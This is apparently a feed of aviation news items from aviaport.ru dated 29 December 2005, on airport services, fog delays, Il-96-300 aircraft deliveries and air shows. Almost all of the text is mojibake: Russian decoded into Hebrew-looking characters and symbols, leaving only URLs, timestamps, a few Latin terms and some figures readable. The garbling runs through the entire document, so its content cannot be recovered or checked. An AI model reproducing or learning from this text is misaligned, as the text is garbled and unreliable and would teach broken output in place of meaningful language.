דֶ׀ ¦  ­ה׃ זפַ.ל װ דוײש¨¨ כב¨ׂ ׳׳׳ "ׁטַ׳¾ׁ-¡קבײ" ״בײ·ףכײ¦·ו ף ״ב כֶח כײף¦חץװסµ דח¦ײכ ¨ב¨ף דײ¢דוכ¨װװח ד¨ום זפַ כ  קבײ״ײבו µ ױ·יװ¨¬ײ ױײכ¬ײבײ¦ , ¨בׂ·, לײ׀¬ײ¬ב ¦ , זׂ¨װ· · ¨׀¢·װדֶ . ל 2005 ¬ײ¦ח ׳׳׳ "ׁטַ׳¾ׁ-¡קבײ" ײדחש¨דוכ·׀ײ ף ״ב כֶח כ ײ¢¨ׂ¨ ײֶײ׀ײ 100 וסד. וײװװ  כ· ֶ¨בײד·װ .ג ףכ·ו·¨  כ· וײ״׀·כײף ״ב כײװײ¬ײ ¢·ףװ¨ד  ״ב¨¦חדׂײוב¨װײ כ בײ¬ב ׂׂ¨ דוב ו¨¬·¨דֶײ¬ײ ב ףכ·ו· ­בח״״ס "ׁטַ׳¾ׁ" · ״ב¨¦״ײ׀ ¬ ¨ו ב דץ·ב¨װ·¨ בסװֶ  ד¢סו   כ· וײ״׀·כ  · דײף¦ װ·¨ ב ףכ·וײ½ ד¨ו· דײ¢דוכ¨װװסµ וײ״׀·כײף ״ב כײװסµ ֶײׂ״׀¨ֶדײכ כ  קבײ״ײבו µ גײדד·· · ף  בח¢¨יײׂ. - - - - - ײכ·׀ דם i-mode כ¨בד· ד ½ו   קבײ״ײבו  "§ײׂײ¦¨¦ײכײ" - http://www.aviaport.ru/news/2005/12/29/99262.html - ל ¸װו¨בװ¨ו¨ ״ײכ·׀ דם i-mode כ¨בד· ד ½ו   קבײ״ײבו  "§ײׂײ¦¨¦ײכײ". §׀ ״ײ׀םףײכ ו¨׀¨½ ׂײ¢·׀םװסµ ו¨׀¨×ײװײכ ¦ײדוח״װײ ײװ׀ ½װ-ו ¢׀ײ · ב ד״·ד װ·¨ - Thu, 29 Dec 2005 16:52:00 +0300 - ל ¸װו¨בװ¨ו¨ ״ײכ·׀ דם i-mode כ¨בד· ד ½ו   קבײ״ײבו  "§ײׂײ¦¨¦ײכײ", - ¦׀ ״ײ׀םףײכ ו¨׀¨½ ׂײ¢·׀םװסµ ו¨׀¨×ײװײכ ¦ײדוח״װײ ד ׂײ¨ ײדװײכװײ¨ - ײװ׀ ½װ-ו ¢׀ײ · ב ד״·ד װ·¨.ל ¢׀·י ½ץ¨¨ כב¨ׂ ¢ח¦¨ו ײוֶבסו ¨ש¨ ײ¦·װ ֶ װ ׀ ¦ײדו כֶ· ·װ×ײבׂ ₪·· ד ¸װו¨בװ¨ו-ד ½ו  - ד ½ו ¦׀ ַַ. ױ ״ײׂװ·ׂ, וײ װ  ¦ װװס½ ׂײׂ¨װו ףײװ ׂ· ״ײֶבסו· Wi-Fi כ׀וד כ¨דם כוײבײ½ קו י, ¢·ףװ¨ד-ף ׀ס · ף ׀ ײ×·₪· ׀םװסµ ¦¨׀¨¬ ₪·½ · VIP.ױ  ¦װµ ¢ח¦¨ו ב¨ץ וםד כײ״בײד ײ¢ חכ¨׀·¨װ·· ףײװס ״ײֶבסו·, כ וײׂ ·ד׀¨ ײ¢¨ד״¨·ום ¦ײדוח״ ״ײ Wi-Fi כ ף ׀ µ ״ב·׀¨ו  · ײי·¦ װ· ׂ¨י¦חװ בײ¦װסµ · כװחוב¨װװ·µ ב¨½דײכ, כ װײכסµ ״ײׂ¨ש¨װ·µ, ֶײוײבס¨ ״ײכוד ״ײד׀¨ כסװײד  × ד ¦   קבײכײֶף ׀ . - - - - - ב ידֶ·½  קבײ״ײבו  דו·װײ ף ֶבסו ·ף-ף  דװ¨¬ײ״ ¦  - http://www.aviaport.ru/news/2005/12/29/99261.html - ׃¨י¦חװ בײ¦װס½  קבײ״ײבו ב ¬· גחףסװ¨  דו·װײ ף ֶבסו כ ¨וכ¨ב¬ ״ײד׀¨ װײװײ¬ײ דװ¨¬ײ״ ¦  - Thu, 29 Dec 2005 16:49:00 +0300 - ׃¨י¦חװ בײ¦װס½  קבײ״ײבו ב ¬· גחףסװ¨  דו·װײ ף ֶבסו כ ¨וכ¨ב¬ ״ײד׀¨ װײװײ¬ײ דװ¨¬ײ״ ¦ . ב¨דד-ד¨ֶב¨ו בם  ¦ׂ·װ·דוב ₪··  קבײ״ײבו  דײײ¢ש·׀ , וײ ד ׂײ׀¨וס װ¨ ׂײ¬חו כף׀¨ו ום ·  קבײ״ײבו כ דײדוײװ·· ״ב·װ·ׂ ום וײ׀םֶײ 15 ד ׂײ׀¨וײכ כ  ד. ׳װ  װ¨ דײײ¢ש·׀  כב¨ׂ¨װ· ״ײ׀װײ¬ײ כײדדו װײכ׀¨װ· ב ¢ײוס  קבײ״ײבו . - - - - - גך§ ײוֶבײ¨ו ״בׂײ¨ י¨׀¨ףװײ¦ײבײיװײ¨ דײײ¢ש¨װ·¨ ײו ׃ײדֶכס ¦ײ  קבײ״ײבו  "צ¨ב¨ׂ¨ום¨כײ" ֶ 2007 ¬ײ¦ח - http://www.aviaport.ru/news/2005/12/29/99260.html - ׳¡׳ "גײדד·½דֶ·¨ י¨׀¨ףװס¨ ¦ײבײ¬·" ״׀ װ·בח¨ו ײוֶבסום ״בׂײ¨ י¨׀¨ףװײ¦ײבײיװײ¨ דײײ¢ש¨װ·¨ ײו ׃ײדֶכס (ה כ¨׀ײכדֶ·½ כײֶף ׀) ¦ײ  קבײ״ײבו  "צ¨ב¨ׂ¨ום¨כײ" ֶ 1 װכ ב 2007 ¬. - Thu, 29 Dec 2005 16:45:00 +0300 - ׳¡׳ "גײדד·½דֶ·¨ י¨׀¨ףװס¨ ¦ײבײ¬·" (גך§) ״׀ װ·בח¨ו ײוֶבסום ״בׂײ¨ י¨׀¨ףװײ¦ײבײיװײ¨ דײײ¢ש¨װ·¨ ײו ׃ײדֶכס (ה כ¨׀ײכדֶ·½ כײֶף ׀) ¦ײ  קבײ״ײבו  "צ¨ב¨ׂ¨ום¨כײ" ֶ 1 װכ ב 2007 ¬ײ¦ , דײײ¢ש·׀ ¬׀ כ  ×·׀· ׀  גך§ "׃ײדֶײכדֶ  י¨׀¨ףװ  ¦ײבײ¬ " (׃ך§) ל׀ ¦·ׂ·ב הו בײדו¨װֶײ יחבװ ׀·דו ׂ כ ׂ·װחכץח דב¨¦ח כ ׃ײדֶכ¨."׃ס ב דד·וסכ ¨ׂ, וײ ֶ װ  ׀ח 2007 ¬ײ¦  חד״¨¨ׂ ״ײדובײ·ום י¨׀¨ףװײ¦ײבײיװח כ¨וֶח ײו ׁײ¢װ· ¦ײ  קבײ״ײבו ", - דֶ ף ׀ ל.הו בײדו¨װֶײ. ׳װ ײוׂ¨ו·׀, וײ װ  ׀ײ דובײ·ו¨׀םדוכ  ף ״׀ װ·בײכ װײ װ   ״ב¨׀ם 2006 ¬ײ¦ .ײ ¨¬ײ ד׀ײכ ׂ, ב¨ם ·¦¨ו ײ דובײ·ו¨׀םדוכ¨ 8,2 ֶׂ ״חו¨½, ֶײוײבײ¨ ¢ח¦¨ו ×·װ װד·בײכ וםד ף  ד¨ו ·װכ¨דו״בײ¬ב ׂׂס גך§.­׀ כ  ׃ך§ ײוׂ¨ו·׀ ו ֶי¨, וײ ״ײֶ  װ¨דװײ, ¬¦¨ ¢ח¦¨ו ב ד״ײ׀ ¬ וםד י¨׀¨ףװײ¦ײבײיװ  דו װ₪· כ "צ¨ב¨ׂ¨ום¨כײ". "©ד׀· ¢ח¦¨ו ¬ײוײכ ו¨בׂ·װ ׀ ("צ¨ב¨ׂ¨ום¨כײ-3" - ¸«), וײ ״ײ¨ף¦ ״ײ¦ײ½¦¨ו וח¦ , ¨ד׀· װ¨ו, וײ ׂס ¬ײוײכס ״ײדובײ·ום ײ¢סװח דו װ₪·", - דֶ ף ׀ ל.הו בײדו¨װֶײ. - - - - - רֶד״׀ח ו ₪· ד ׂײ׀¨וײכ ¡װ-140 ׂײ¬חו כב¨ׂ¨װװײ ״ב·ײדו װײכ·ום - http://www.aviaport.ru/news/2005/12/29/99259.html - רֶד״׀ח ו ₪· ד ׂײ׀¨וײכ ¡װ-140 ׂײ¬חו כב¨ׂ¨װװײ ״ב·ײדו װײכ·ום ¦ײ כסדװ¨װ· כד¨µ ײ¢דוײו¨׀םדוכ ֶ ו דובײ×ס ׂ ץ·װס כ ¡ף¨ב¢ ½¦י װ¨ - Thu, 29 Dec 2005 16:43:00 +0300 - רֶד״׀ח ו ₪· ד ׂײ׀¨וײכ ¡װ-140 ׂײ¬חו כב¨ׂ¨װװײ ״ב·ײדו װײכ·ום ¦ײ כסדװ¨װ· כד¨µ ײ¢דוײו¨׀םדוכ ֶ ו דובײ×ס ׂ ץ·װס כ ¡ף¨ב¢ ½¦י װ¨.ז ֶח וײֶח ףב¨װ· כסדֶ ףסכ ו קֶד״¨בוס, ֶײׂׂ¨װו·בח כ¨בד·· ֶ ו דובײ×ס ד ׂײ׀¨ו  ״ײ¦ £ ֶח.הײ¬׀ דװײ ײ¦װײ½ ·ף װ·µ, ״ב··װײ½ ״ ¦¨װ· ¡װ-140 דו ׀· ו¨µװ·¨דֶ·¨ װ¨״ײ׀ ¦ֶ·, · וײ¢ס ״ײ׀װײדום ·דֶ׀·ום כ¨בײוװײדום ״ײכוײב¨װ· וב ¬¨¦··, ״ײ׀¨וס ¦¨דוֶ  װ µײ¦ש·µד ד¨½ ד כ קֶד״׀ח ו ₪·· חֶב ·װדֶ·µ  כ· ֶײׂ״ װ·½ ׂ ץ·װ קוײ¬ײ ו·״  ׂײ¬חו ״ב·ײדו װײכ·ום.ב¨¦דו כ·ו¨׀· ­ײד כ· ד׀חי¢ס טֶב ·װס ¦ װװח ·װ×ײבׂ ₪· װ¨ ״ײ¦וכ¨בי¦ ו, ף כ׀, וײ י¦חו ײֶײװ ו¨׀םװסµ כסכײ¦ײכ ֶײׂ·דד·· כ ¡ף¨ב¢ ½¦י װ¨.׳¦װ ֶײ קֶד״¨בוס ¬ײכײבו - ף ״ב¨ו כד¨ י¨ ׂײי¨ו ¢סום ככ¨¦¨װ, דדס׀ דם װ  ײ״סו וײ½ י¨ גײדד··, ¬¦¨ ·ף-ף  ״ײ׀ײֶׂ· כ ץ דד· ״ב¨ף·¦¨װודֶײ¬ײ ד ׂײ׀¨ו  ¢ס׀· ״ײדו כ׀¨װס װ  ״ב·ֶײ׀ כד¨ ׂ ץ·װס ¦ װװײ½ ׂײ¦¨׀·. - - - - - ¡קבײ״ײבוס ׃ײדֶכס ב ¢ײו ו "״ײ × ֶו·¨דֶײ½ ״ײ¬ײ¦¨" - http://www.aviaport.ru/news/2005/12/29/99258.html - ¸ף-ף  ד·׀םװײ¬ײ דװ¨¬ײ״ ¦  כ ׃ײדֶכ¨  קבײ״ײבוס "לװחֶײכײ", "§ײׂײ¦¨¦ײכײ" · "צ¨ב¨ׂ¨ום¨כײ" ב ¢ײו ו "״ײ × ֶו·¨דֶײ½ ״ײ¬ײ¦¨", װײ ף ¦¨בי¨ֶ ד כס׀¨ו ׂ· · ״ב·¢סו·¨ׂ ב¨½דײכ װ¨ו - Thu, 29 Dec 2005 16:36:00 +0300 - ¸ף-ף  ד·׀םװײ¬ײ דװ¨¬ײ״ ¦  כ ׃ײדֶכ¨ דוײ׀·װס¨  קבײ״ײבוס "לװחֶײכײ", "§ײׂײ¦¨¦ײכײ" · "צ¨ב¨ׂ¨ום¨כײ" ב ¢ײו ו "״ײ × ֶו·¨דֶײ½ ״ײ¬ײ¦¨", װײ ף ¦¨בי¨ֶ ד כס׀¨ו ׂ· · ״ב·¢סו·¨ׂ ב¨½דײכ װ¨ו. ׳¢ קוײׂ דײײ¢ש·׀ כ ¨וכ¨ב¬ ג¸¡ ױײכײדו· ״ב¨¦דו כ·ו¨׀ם ¥¨װוב ׀םװײ½ ¦·ד״¨ו¨בדֶײ½ ד׀חי¢ס (¥§ה) ׃ײדֶכס."לד¨ דוײ׀·װס¨  קבײ״ײבוס ב ¢ײו ו ד¨½ ד "״ײ × ֶו·¨דֶײ½ ״ײ¬ײ¦¨", וײ ¨דום, ״·׀ײוס ד ׂײדוײו¨׀םװײ ״ב·װ·ׂ ו ב¨ץ¨װ·¨ ײ ״ײד ¦ֶ¨. ׳¦װ ֶײ װ·ֶ ֶ·µ ף ¦¨בי¨ֶ ד כס׀¨ו ׂ· · ״ב·¢סו·¨ׂ ב¨½דײכ כ  קבײ״ײבו µ װ¨ו", - דֶ ף ׀ ״ב¨¦דו כ·ו¨׀ם ¥§ה.׳װ ו ֶי¨ ײוׂ¨ו·׀, וײ "װ· ײ¦·װ  קבײ״ײבו װ¨ ײ¢כ·׀ ײ ף ֶבסו·· ·ף-ף  ״ײ¬ײ¦ס"."לײ כד¨µ  קבײ״ײבו µ ד¨½ ד כ·¦·ׂײדום דײדו כ׀¨ו ¢ײ׀¨¨ וסד· ׂ¨ובײכ. לד¨ כף׀¨וס · ״ײד ¦ֶ· ײדחש¨דוכ׀וד ״ײ ב ד״·ד װ·, ¢¨ף ד¢ײ¨כ. « ֶוײכ ף ֶבסו·  קבײ״ײבוײכ װ¨ ¢ס׀ײ", - דײײ¢ש·׀ דײ¢¨ד¨¦װ·ֶ  ¬¨װודוכ .ײ ¨¬ײ ד׀ײכ ׂ, כײ כד¨µ דוײ׀·װסµ  קבײ״ײבו µ כ װ דוײש¨¨ כב¨ׂ ב ¢ײו ¨ו ד״¨₪ו¨µװ·ֶ  ¦׀ ב ד·דוֶ· דװ¨¬ . "ל ד׀ח ¨ חד·׀¨װ· דװ¨¬ײ״ ¦ , כ  קבײ״ײבו µ ¢ח¦¨ו ככ¨¦¨װ  ¦ײ״ײ׀װ·ו¨׀םװ  ד״¨₪ו¨µװ·ֶ ", - ¦ײ¢ כ·׀ ״ב¨¦דו כ·ו¨׀ם ¥§ה. - - - - - ¡כ· ״בײׂ װ  ·ף׀¨ו¨ - http://www.aviaport.ru/news/2005/12/29/99257.html - פ וװחכץ¨¨ד ײי·¦ װ·¨ ב¨ץ¨װ·½ כ׀ דו¨½ ײ דח¦ם¢¨ בײדד·½דֶײ¬ײ  כ· ״בײׂ  · דֶ װ¦ ׀ כײֶבח¬ ף ״ב¨ו  װ  ״ײ׀¨וס ¸׀-96-300 - ¬׀ כװס¨ ·וײ¬·  כ· ₪·ײװװײ½ ײוב ד׀· כ 2005 ¬. - Thu, 29 Dec 2005 16:31:00 +0300 - פ וװחכץ¨¨ד ײי·¦ װ·¨ ב¨ץ¨װ·½ כ׀ דו¨½ ײ דח¦ם¢¨ בײדד·½דֶײ¬ײ  כ· ״בײׂ  · דֶ װ¦ ׀ כײֶבח¬ ף ״ב¨ו  װ  ״ײ׀¨וס ד ׂײ¬ײ װײכײ¬ײ ײו¨¨דוכ¨װװײ¬ײ ¦ ׀םװ¨ׂ ¬·דוב ׀םװײ¬ײ ד ׂײ׀¨ו  ¸׀-96-300 - ¬׀ כװס¨ ·וײ¬·  כ· ₪·ײװװײ½ ײוב ד׀· כ 2005 ¬ײ¦ח.ב¨¦״ײ׀ײי·ו¨׀םװײ װ  ״¨בכײׂ קו ״¨ כ ׳¡ַ ¢ח¦חו כװ¨ד¨װס ¬ײדח¦ בדוכ¨װװס¨ ״ ֶ¨וס  ֶ₪·½ ¡¶ַ "החµײ½", ׃¡ַ "¸׀םץ·װ", ׳¡׳ "זח״ײ׀¨כ", ף כײ¦  "הײֶײ׀", ַײׂדײׂײ׀םדֶײ¬ײ-װ -¡ׂחב¨  כ· ₪·ײװװײ¬ײ ״בײ·ףכײ¦דוכ¨װװײ¬ײ ײ¢¨¦·װ¨װ·, ױײכײד·¢·בדֶײ¬ײ  כ· ₪·ײװװײ¬ײ ״בײ·ףכײ¦דוכ¨װװײ¬ײ ײ¢¨¦·װ¨װ·, "¡כ· קֶד״ײבו ",   ו ֶי¨ «·װ װדײכײ½ ׀·ף·װ¬ײכײ½ ֶײׂ״ װ·· · ֶײׂ״ װ·· "¸׀םץ·װ «·װ װד ַײ". ױ  כוײבײׂ קו ״¨ ֶ ֶײב״ײב ₪·· ״ײ¦ֶ׀·וד "¸בֶחו", ֶײוײבײׂח ׂװײ¬·¨ ״בײ ו ׀·¦¨בדוכײ כ ֶײב״ײב ₪··. ׳¦װ  ·ף ד ׂסµ כ¨בײוװסµ ֶ װ¦·¦ וחב װ  וײ, וײ¢ס כײף¬׀ כ·ום ׳¡ַ, - ·ד״ײ׀װ·ו¨׀םװס½ ¦·ב¨ֶוײב "¸בֶחו " ל ׀¨ב·½ £¨ףכ¨בµװ·½. ל 2005 ¬ײ¦ח ״ב כ·ו¨׀םדוכײ ״׀ װ·בײכ ׀ײ כד¨בם¨ף ף װוםד ײ¢¨¦·װ¨װ·¨ׂ בײדד·½דֶ·µ  כ· ₪·ײװװסµ  ֶו·כײכ. ל רכב ׀¨ ל׀ ¦·ׂ·ב חו·װ ב ד״ײב¦·׀ד ״ײ¦¬ײוײכ·ום ״בײ¨ֶו חֶ ף  ״ײ ײ¢¨¦·װ¨װ· כד¨µ  כ· דובײ·ו¨׀םװסµ ף כײ¦ײכ כ ¨¦·װח ֶײׂ״ װ·. ב¨¦״ײ׀ ¬ ׀ײדם, וײ ״ב¨ף·¦¨װו ״ײ¦״·ץ¨ו ¦ײֶחׂ¨װו ֶ 1 ¦¨ֶ ¢ב. ױײ כ ·וײ¬¨ ײװ װ¨ וײ׀םֶײ װ¨ ¢ס׀ ״ײ¦״·ד װ, װײ · ¦ײ ד·µ ״ײב ײדו ¨וד ף ¬ ¦ֶײ½, װ  ֶ ֶ·µ חד׀ײכ·µ ¢ח¦¨ו ״בײכײ¦·וםד ֶײװדײ׀·¦ ₪·.ַײװדײ׀·¦ ₪· בײדד·½דֶ·µ כ¨בוײ׀¨וװסµ ף כײ¦ײכ כ 2005 ¬ײ¦ח דײדוײ׀ דם. ל דײדו כ µײ׀¦·װ¬  װ  ¢ ף¨ "׳¢ײבײװ״בײׂ " כײץ׀· ׳¡׳ "׃ײדֶײכדֶ·½ כ¨בוײ׀¨וװס½ ף כײ¦", ׳¡׳ "ט׀ װ-ט¦·װדֶ·½  כ· ₪·ײװװס½ ף כײ¦", ׳¡׳ "ַ ף װדֶ·½ כ¨בוײ׀¨וװס½ ף כײ¦", ׳¡׳ "גײדוכ¨בוײ׀", ׳¡׳ "׃ײדֶײכדֶ·½ ׂ ץ·װײדובײ·ו¨׀םװס½ ף כײ¦ "ל״¨ב¨¦"", ׳¡׳ "הוח״·װדֶײ¨ ׂ ץ·װײדובײ·ו¨׀םװײ¨ ״בײ·ףכײ¦דוכ¨װװײ¨ ״ב¨¦״ב·ו·¨". ױײ ״בײ₪¨דד ײדו כ·׀ ¢ײ׀םץ¨ כײ״בײדײכ, ¨ׂ ײוכ¨וײכ, ״ב·ףװ וד קֶד״¨בוס. "¨ב¨µײ¦ װ  ײ¦װח  ֶ₪· ״בײץ¨׀ ֶ ֶ-וײ דֶײֶׂ װװײ. ױ¨דװײ, ״ײ ֶ ֶײׂח ״ב·װ₪·״ח ¢ס׀ כס¢ב װ ֶײק××·₪·¨װו ײ¢ׂ¨װ , װ ״ב·ׂ¨ב", - ״ײ¦כײ¦·ו ·וײ¬·  װ ׀·ו·ֶ ¸ַ "ג¨װ¨דד װד ַ ״·ו ׀" ׃ ב·װ  ¡׀¨ֶד¨¨װֶײכ .׳¢¨¦·װ¨װ·¨  כ· ֶײׂ״ װ·½ ¢ס׀ײ ״בײכ ׀¨װײ, ײ¢ קוײׂ כ ֶײװ₪¨ ¦¨ֶ ¢ב װ ״ײׂװ·׀ ׂ·װ·דוב וב װד״ײבו  ¸¬ײבם ׁ¨כ·ו·װ. ױ· ײ¢¨¦·װ¨װ·¨ כײֶבח¬ "ַב דר½ב" (AiRUnion), װ· ב¨×ײבׂ ₪· "ח׀ֶײכײ" · "גײדד··" כ ״ײ׀װײ½ ׂ¨ב¨ כ 2005 ¬ײ¦ח װ¨ ף כ¨בץ·׀·דם. ׃¨י¦ח ו¨ׂ ֶײװדײ׀·¦ ₪· - ¨¦·װדוכ¨װװס½ ד״ײדײ¢ כסי·ום װ  בסװֶ¨ ¦׀ בײדד·½דֶ·µ  כ· ֶײׂ״ װ·½ כ חד׀ײכ·µ ¦ײבײ¬ײ¬ײ ¬ײב¨¬ײ · ·ףװײץ¨װװײ½ ו¨µװ·ֶ·.פ וײ כ 2005 ¬ײ¦ח גײדד·· ח¦ ׀ײדם ״בײכ¨דו· ד ׂס½ ¢ײ׀םץײ½  כ· ֶײדׂ·¨דֶ·½ ד ׀ײװ ף  כד ·דוײב· - ׃¡ַה-2005 כ ״ײ¦ׂײדֶײכװײׂ ךחֶײכדֶײׂ. ה ׀ײװ דײ¢ב ׀ ״ב¨¦דו כ·ו¨׀¨½ ¢ײ׀¨¨ ¨ׂ 600 ֶײׂ״ װ·½ ·ף 40 דוב װ.ײ קוײׂח ״ײֶ ף ו¨׀ ׃¡ַה חי¨ ׂײיװײ דב כװ·כ ום ד ֶבח״װ¨½ץ·ׂ· ד ׀ײװ ׂ· כ ׁ¨-£חבי¨ («ב װ₪·), כ §ח¢ ¨ (׳¡ר), « בװ¢ײבײ (ל¨׀·ֶײ¢ב·ו װ·).ױ¨ ״ײ׀ח·׀ײדם וײ׀םֶײ ד¦¨׀ ום  כ· ₪·ײװװח בׂ בֶח כד¨ׂ·בװײ½. ל ךחֶײכדֶ·½ ״ב·¨µ ׀· וײ׀םֶײ ״בײ·ףכײ¦·ו¨׀·, ֶײוײבס¨ ¢ס׀· ף ·װו¨ב¨דײכ װס כ דײובח¦װ·¨דוכ¨ ד גײדד·¨½. ל ·וײ¬¨ ף  ״ום ¦װ¨½  כ· ד ׀ײװ  כ ךחֶײכדֶײׂ ¢ס׀· ף ֶ׀¨װס ֶײװוב ֶוס װ  ײ¢שח דחׂׂח $4 ׂ׀ב¦, ח·וסכ  ״ב¨¦כ ב·ו¨׀םװס¨ דײ¬׀ ץ¨װ·. ױ   כ· ד ׀ײװ¨ כ §ח¢ ¨ כ װײ¢ב¨ 2005 ¬ײ¦  ֶײװוב ֶוס ¢ס׀· ף ֶ׀¨װס װ  דחׂׂח $25 ׂ׀ב¦. ¸ ¨ד׀· כ §ח¢ ¨ דײ׀·בײכ ׀· כ ײדװײכװײׂ ו ֶ·¨ ׂ·בײכס¨ ¬·¬ װוס, ֶ ֶ Airbus · Boeing, וײ כ ךחֶײכדֶײׂ ײװ· ¢ס׀· װ¨ף ׂ¨וװס: ¢ײ׀םץ¨ כד¨¬ײ ֶײװוב ֶוײכ ף ֶ׀·׀  "¸׀םץ·װ ×·װ װד" - ״ב·¢׀·ף·ו¨׀םװײ װ  $1,6 ׂ׀ב¦. "¸ כד¨-ו ֶ· ו ֶײ¬ײ ד·׀םװײ¬ײ ד ׀ײװ  ״ײ ¢·ףװ¨ד-דײדו כ׀ש¨½ ¨ש¨ װ¨ ¢ס׀ײ", - ף ׂ¨ ¨ו  װ ׀·ו·ֶ ¥¨װוב   װ ׀·ף  דוב ו¨¬·½ · ו¨µװײ׀ײ¬·½ ַײװדו װו·װ ׃ ֶ·¨װֶײ.ׁ¨וײׂ, דב ףח ״ײד׀¨  כ· ד ׀ײװ , כד ײוב ד׀ם ״ײובד דֶ װ¦ ׀ ד ף ״ב¨וײׂ װ  ״ײ׀¨וס ¸׀-96-300.׃װ¨װ·  װ ׀·ו·ֶײכ¡װ ׀·ו·ֶ·, ײ״בײץ¨װװס¨ "­ ף¨וײ½.Ru", װ¨ ד·ו ו חµײ¦ש·½ ¬ײ¦ ח¦ װסׂ ״ײ ׂװײ¬·ׂ ״ב··װ ׂ."ױ¨ו ¨¦·װײ½ ״ײ׀·ו·ֶ·, ֶ ֶ·¨ ד ׂײ׀¨וס ב ףב ¢ וסכ ום, ֶ ֶ·¨ ״ײ¦¦¨בי·כ ום. ל ·וײ¬¨ ״בײ¦חֶו  װ¨ו,   ¨דום וײ׀םֶײ ֶײװֶחב¨װוװ  ¢ײבם¢ , ֶײוײב  ׂ¨ץ ¨ו  כ· ״בײׂח. לײףׂײיװײ, כ 2006 ¬ײ¦ח ײו ד׀ײכ ״¨ב¨½¦חו ֶ ¦¨׀ח", - ד·ו ¨ו ¸׀ם ׃ ֶ בײכ ·ף "¡װו װוס ַ ״·ו ׀"."ך¦ ׀· ¢ײ׀םץ¨¬ײ, - ״ײ¦וכ¨בי¦ ¨ו ׃ ב·װ  ¡׀¨ֶד¨¨װֶײכ  ·ף "ג¨װ¨דד װד ַ ״·ו ׀ ". - ב·¨ׂ קוײ ײי·¦ װ·¨ ף וװח׀ײדם. ¸ קוײ ״ב· וײׂ, וײ ח ײוב ד׀· ¢ײ׀םץײ½ ״ײו¨װ₪· ׀"."ב ֶו·¨דֶ· כ ײ¢׀ דו·  כ· ״בײׂסץ׀¨װװײדו· װ·¨¬ײ ד¨בם¨ףװײ¬ײ ף  ¬ײ¦ װ¨ ״בײ·ףײץ׀ײ", - ײוׂ¨ ¨ו ¦·ב¨ֶוײב ֶײװד ׀ו·װ¬ײכײ½ ֶײׂ״ װ·· Infomost £ײב·ד גס¢ ֶ."¶ײו¨׀ײדם ¢ס ¢ײ׀םץ¨¬ײ, װײ · ב¨ףח׀םו וס ײ¨כ·¦װס. ­ײדח¦ בדוכײ ״ײכ¨בװח׀ײדם ֶ  כ· ״בײׂח. ל ״ײדודײכ¨ודֶײ¨ כב¨ׂ ¨ש¨ װ·ֶײ¬¦  דוײ׀םֶײ כװ·ׂ װ· װ¨ ¢ס׀ײ װ· ״ײ ¦¨װם¬ ׂ, װ· ״ײ ב ף׀·װסׂ ״בײ¨ֶו ׂ · ״׀ װ ׂ ב ףכ·ו·", - חכ¨ב¨װ ַײװדו װו·װ ׃ ֶ·¨װֶײ ·ף ¥¨װוב   װ ׀·ף  דוב ו¨¬·½ · ו¨µװײ׀ײ¬·½. ב¨ף·¦¨װודֶ·½ ד ׂײ׀¨ו,   ו ֶי¨ ¨ש¨ 12 ׀ ½װ¨בײכ בײדד·½דֶ·µ  כ· ֶײׂ״ װ·½ כדו ׀· ¢ײ׀¨¨ ¨ׂ װ  ׂ¨ד₪. ַ ֶ דו ׀ײ ·ףכ¨דוװײ ״ײף¦װ¨¨, ·ׂ¨װװײ  ¦ׂ·װ·דוב ₪· ״ב¨ף·¦¨װו  ״¨ב¨דוב µײכ ׀ דם · ״ײכ׀·׀  װ  ב¨ץ¨װ·¨ גײדוב װדװ ¦ףײב  ף ״ב¨ו·ום ״ײ׀¨וס ¸׀-96-300. רוײ ״בײ·ףײץ׀ײ ״ײד׀¨ וײ¬ײ, ֶ ֶ כ װ  ׀¨  כ¬חדו  ל׀ ¦·ׂ·ב חו·װ, װ µײ¦·כץ·½ד ד ײ×·₪· ׀םװסׂ כ·ף·וײׂ כ «·װ׀װ¦··, װ¨ דׂײ¬ כס׀¨ו¨ום ·ף  קבײ״ײבו  זחבֶח · ¢ס׀ כסװחי¦¨װ ״¨ב¨ד¨דום װ  ף ״ דװײ½ ד ׂײ׀¨ו. ט ׀ ½װ¨בײכ ¢ס׀· כסכ׀¨װס װ בחץ¨װ· וײבׂײףװײ½ ד·דו¨ׂס.׳ו ף ״ב¨ו  ״ײדוב ¦ ׀· װ¨דֶײ׀םֶײ בײדד·½דֶ·µ  כ· ֶײׂ״ װ·½, כ וײׂ ·ד׀¨ "¡קבײ×׀ײו", "§ײׂײ¦¨¦ײכדֶ·¨  כ· ׀·װ··" · "ַב דװײבדֶ·¨  כ· ׀·װ··". לד¨ ײװ· ב דדׂ וב·כ ׀· כײףׂײיװײדום ·דֶײכ ֶ ¬ײדח¦ בדוכח ·׀· ֶ ״בײ·ףכײ¦·ו¨׀ׂ, װײ כ ·וײ¬¨ ײוֶ ף ׀·דם ײו װ ׂ¨ב¨װ· כײףׂ¨דו·ום ״ײו¨ב·.פ ״ב¨ו װ  ײ¦·װ ·ף ד ׂסµ װײכסµ בײדד·½דֶ·µ ¬ב י¦ װדֶ·µ ד ׂײ׀¨וײכ כ ײ¨ב¨¦װײ½ ב ף ח¦ ב·׀ ״ײ ״ב¨דו·יח ײו¨¨דוכ¨װװײ¬ײ  כ· ״בײׂ . ­¨װ¦·ב¨ֶוײב לײבײװ¨ידֶײ¬ײ  ֶ₪·ײװ¨בװײ¬ײ ד ׂײ׀¨וײדובײ·ו¨׀םװײ¬ײ ײ¢ש¨דוכ , ״בײ·ףכײ¦·כץ¨¬ײ ¦¨ו ׀· ֶ ¸׀-96, ל¨ד׀ כ ה ׀·ֶײכ כסװחי¦¨װ ¢ס׀ ח½ו· כ ײודו כֶח.ײד׀¨ דֶ װ¦ ׀  ד ¸׀-96-300 ד װײכײ½ ײדובײוײ½ דו ׀ כײ״בײד ײ ״ײץ׀·װ µ װ  ד ׂײ׀¨וס ף בח¢¨יװײ¬ײ ״בײ·ףכײ¦דוכ . ױ§ה · ו ׂײי¨װװס½ ד¢ײב כׂ¨דו¨ דײדו כ׀ו 40% ₪¨װס ד ׂײ׀¨ו . ױײ קוײו כײ״בײד ¦ײ ֶײװ₪  ¬ײ¦  ו ֶי¨ װ¨ ¢ס׀ ב¨ץ¨װ.פ  בח¢¨יײׂ 2005 ¬ײ¦ ף ״ײׂװ·וד ״ב¨י¦¨ כד¨¬ײ ¬ײװֶײ½ Airbus · Boeing כ ײ¢׀ דו· ¦ ׀םװ¨ׂ ¬·דוב ׀םװסµ ד ׂײ׀¨וײכ. Airbus ״ב¨¦׀ ¬ ¨ו A350 - קֶײװײׂ·װס½ ׀ ½װ¨ב, װײ ײװ דײכ¨בץ·ו ״¨בכס½ ״ײ׀¨ו וײ׀םֶײ ֶ 2010 ¬ײ¦ח. Boeing ײ¢¨ש ¨ו 